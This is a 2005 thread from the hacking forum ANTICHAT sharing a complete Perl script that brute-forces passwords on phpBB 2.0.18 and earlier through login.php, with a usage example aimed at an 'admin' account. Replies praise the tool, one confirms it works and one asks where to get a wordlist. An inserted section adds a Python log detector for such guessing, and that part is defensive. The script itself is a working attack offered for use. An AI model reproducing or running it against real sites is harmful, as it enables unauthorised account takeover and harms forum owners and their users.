phpBB <=2.0.18 "Login Dictionary Attack"

Discussion in 'Forum for discussion of ANTICHAT' started by néM3S!s, 21 Dec 2005.

  1. néM3S!s

    phpBB <=2.0.18 "Login Dictionary Attack"
    --> Brute force login.php with a dictionary

    This exploit was coded by my friend DarkFig. Enjoy, antichat ;)

    Usage: brutephpbb.pl <host> <path> <port> <pass_file> <username> <logfile>

    C:\:brutephpbb.pl www.target.ru /phpBB2/ 80 dictionnary.txt admin result.txt


    Code:
    #!/usr/bin/perl 
    ############################################ 
    #--------------------------Hack Private Version property------------------------- 
    #Credits:                        Weakness and Xploit by DarkFig 
    #Affected products:     All PhpBB versions <= 2.0.18 
    #Type:                            Dictionnary attack 
    #Solutions:                    None official , but many solutions are possible ;) 
    #Note:                           Not yet revealed | If a line of the dictionnary file contain no data => "End of the password file" 
    #For:                             Hack Private Version       
    #------------------------------------------------------------------------------------------------ 
    ############################################ 
    use IO::Socket; 
    
    #--------------Usage--------------# 
    if(@ARGV != 6){ 
    print " 
    +---------------------------------------------------------------------------------+ 
    +--------------------PhpBB <= 2.0.18 Passwd Dictionnary Attack--------------------+ 
    +-----------------------By DarkFig for Hack Private Version-----------------------+ 
    +---------------------------------------------------------------------------------+ 
    + Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile>    + 
    +---------------------------------------------------------------------------------+ 
    + <host>        => The host where PhpBB is installed        |   [Ex: site.com]    + 
    + <path>        => Path of the PhpBB board                  |   [Ex: /forum/]     + 
    + <port>        => PhpBB board port                         |   [Default is 80]   + 
    + <pass_file>   => File containing words (dictionnary file) |   [Ex: dico.txt]    + 
    + <username>    => Username you want to bruteforce          |   [Ex: MasterLamer] + 
    + <file_result> => File you want to log activity            |   [Ex: results.txt] + 
    +---------------------------------------------------------------------------------+ 
    ";exit();} 
    
    #--------------Data--------------# 
    $host       = $ARGV[0]; 
    $path       = $ARGV[1]; 
    $full       = "$host"."$path"; 
    $port       = $ARGV[2]; 
    $pass_file  = $ARGV[3]; 
    $username   = $ARGV[4]; 
    $fileresult = $ARGV[5]; 
    $OK         = 0; 
    $referer    = "http://"."$host"."$path"."login.php?redirect="; 
    $postit     = "$path"."login.php"; 
    
    #--------------Hello world-----------------# 
    print " 
    +---------------------------------------------------------+ 
    + PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig + 
    +---------------------------------------------------------+ 
           [+] Username             | $username 
           [+] Dictionnary file     | $pass_file 
           [+] Attack log           | $fileresult 
    +---------------------------------------------------------+"; 
    
    #--------------Password file--------------# 
    open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n"); 
    chomp(@passdico = <FILE>); 
    $nligne = "0"; 
    while ($OK ne 1) { 
    $passwordz  = "$passdico[$nligne]"; 
    $request    = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion"; 
    $length     = length $request; 
    if ($passwordz eq ""){print "\n[-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();} 
    
    #--------------Sending data--------------# 
    $send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed..."; 
    print $send "POST $postit HTTP/1.1\n"; 
    print $send "Host: $host\n"; 
    print $send "Content-Type: application/x-www-form-urlencoded\n"; 
    print $send "Content-Length: $length\n\n"; 
    print $send "$request\n"; 
    read $send, $answer, 15; 
    close($send); 
    
    #-------------Success--------------------------------------------# 
    if ($answer =~ /HTTP\/(.*?) 302/) { 
    $OK = 1; 
    print " 
           [-] Trying the password "."$passwordz 
           [+] User:     $username 
           [+] Password: $passwordz 
    +---------------------------------------------------------+\n"; 
    open results, ">$fileresult"; 
    print results " 
    +---------------------------------------------------------+ 
    + PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig + 
    +---------------------------------------------------------+ 
        [+] PhpBB board               | $full 
       [+] Board's port              | $port 
       [+] Username                  | $username 
       [+] Dictionnary file          | $pass_file 
        [+] Number of test            | $nligne 
        [+] Password found            | $passwordz 
    +---------------------------------------------------------+\n"; 
    close(FILE);close(results);exit();} 
    
    #-------------Failed--------------------------------------------# 
    if ($OK == 0) {print "\n       [-] Trying the password "."$passwordz";$nligne++;}}
    Made in France ! :D
     
    8 people like this.
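
A defender's view of the traffic the posted script generates, as an added example that is not part of the original post: every guess is a separate POST to login.php and only a 302 response counts as success, so a burst of non-302 POSTs from one address, followed by a 302, stands out in a web access log. The function names, threshold, window and log lines are constructed for illustration, and the combined access-log format is an assumption.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" log format (assumed); only the needed fields are captured.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def detect_login_guessing(lines, threshold=5, window=timedelta(seconds=60)):
    """Return (ip, kind, timestamp) alerts; kind is "burst" or "success_after_burst"."""
    failures = defaultdict(deque)   # ip -> timestamps of recent failed logins
    flagged = set()                 # ips that already raised a "burst" alert
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if not m["path"].split("?", 1)[0].endswith("/login.php"):
            continue
        ip = m["ip"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if m["status"] == "302":    # the only response the script treats as success
            if ip in flagged:
                alerts.append((ip, "success_after_burst", ts))
            failures[ip].clear()
            flagged.discard(ip)
            continue
        q = failures[ip]
        q.append(ts)
        while ts - q[0] > window:   # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged.add(ip)
            alerts.append((ip, "burst", ts))
    return alerts

def sample_log():
    """Constructed log lines using documentation IP ranges, not captured traffic."""
    def line(ip, sec, status):
        return (f'{ip} - - [21/Dec/2005:10:00:{sec:02d} +0000] '
                f'"POST /phpBB2/login.php HTTP/1.1" {status} 512 "-" "-"')
    noisy = [line("192.0.2.10", s, 200) for s in range(6)]       # six failed guesses
    noisy.append(line("192.0.2.10", 6, 302))                     # then a success
    typo = [line("198.51.100.7", 1, 200), line("198.51.100.7", 9, 302)]
    return sorted(noisy + typo, key=lambda l: l.split("[", 1)[1])

if __name__ == "__main__":
    for alert in detect_login_guessing(sample_log()):
        print(alert)
```

A "success_after_burst" alert is the one to act on first: it marks an account whose password should be reset and whose session history should be reviewed.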
  2. néM3S!s

  3. GreenBear

    big tnx
    nice ;)
     
  4. x-ultra-x

    well done man, good job!
     
  5. max_pain89

    good... ;) France is friend
     
  6. néM3S!s

    ipb, punbb versions coming soon ;)

    Powaaaaaaaa my friends !
     
  7. NeMiNeM

    The speed is not very high, but IT WORKS=) 10x
    +!
     
  8. roruda_semu

    Good job Nemesis, thanks
     
  9. Гаврила

    Excuse me, where can I get a dictionary?
     
  10. Otaku
